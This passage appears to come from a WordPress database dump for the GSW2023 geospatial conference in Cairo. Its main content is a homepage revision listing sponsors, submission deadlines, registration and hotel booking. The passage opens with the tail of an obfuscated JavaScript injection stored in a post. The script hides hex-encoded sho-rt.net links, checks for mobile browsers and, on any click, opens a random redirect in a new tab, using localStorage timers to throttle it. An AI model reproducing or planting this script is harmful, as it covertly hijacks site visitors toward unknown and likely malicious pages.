_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:14:54','2023-05-17 04:14:54','',3066,'https://gsw2023.com/?p=4506',0,'revision','',0),
(4507,1,'2023-05-17 04:19:54','2023-05-17 04:19:54','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\"][vc_column][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#8224e3\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #993300;\"><strong><a style=\"color: #993300;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h4>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgsw2023-venue%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684296853410{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: 